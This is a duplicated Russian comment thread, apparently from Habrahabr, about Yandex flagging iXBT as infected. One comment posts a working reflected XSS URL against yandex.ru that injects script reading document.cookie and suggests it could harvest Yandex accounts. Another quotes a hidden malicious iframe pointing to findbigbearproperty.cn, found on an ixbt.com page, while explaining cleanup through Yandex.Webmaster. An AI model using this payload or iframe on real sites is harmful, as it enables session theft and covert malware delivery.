Comments 14
У самих же пассивная XSS.
yandex.ru/infected?url=http%3A%2F%2Fwww.ixbt.com%2Fdivideo%2Fdivx-specidy.shtml&return=%22%3E%3C/a%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Ca%20href=%22
Думаю с помощью данной XSS можно много акков от Яндекса собрать.
yandex.ru/infected?url=http%3A%2F%2Fwww.ixbt.com%2Fdivideo%2Fdivx-specidy.shtml&return=%22%3E%3C/a%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Ca%20href=%22
Думаю с помощью данной XSS можно много акков от Яндекса собрать.
А я вас предупреждал!
В хроме можно позаходить на эту страничку: habrahabr.ru/blogs/flash/
Добрый день.
Для того, чтобы быстро понять, где искать и что удалять, стоит зарегистрировать свой сайт в Яндекс.Вебмастере — там приводятся примеры зараженных страниц. Ну вот, например, ixbt.com/comm/homepna.shtml, там есть вот такой вот iframe:
src=«http:// findbigbearproperty.cn:8080/ts/in.cgi?pepsi9» width=2 height=4 style=«visibility: hidden»
Если сайт зарегистрирован в Я.Вебмастере, владельцу приходит сообщение о том, что наша система обнаружила потенциально опасную страницу. Там же можно запросить перепроверку сайта после удаления вредоносного кода. Таким образом, за несколько часов можно все исправить, и пометка в результатах поиска снимется.
Для того, чтобы быстро понять, где искать и что удалять, стоит зарегистрировать свой сайт в Яндекс.Вебмастере — там приводятся примеры зараженных страниц. Ну вот, например, ixbt.com/comm/homepna.shtml, там есть вот такой вот iframe:
src=«http:// findbigbearproperty.cn:8080/ts/in.cgi?pepsi9» width=2 height=4 style=«visibility: hidden»
Если сайт зарегистрирован в Я.Вебмастере, владельцу приходит сообщение о том, что наша система обнаружила потенциально опасную страницу. Там же можно запросить перепроверку сайта после удаления вредоносного кода. Таким образом, за несколько часов можно все исправить, и пометка в результатах поиска снимется.
Sign up to leave a comment.
iXBT заражен, по версии Яндекса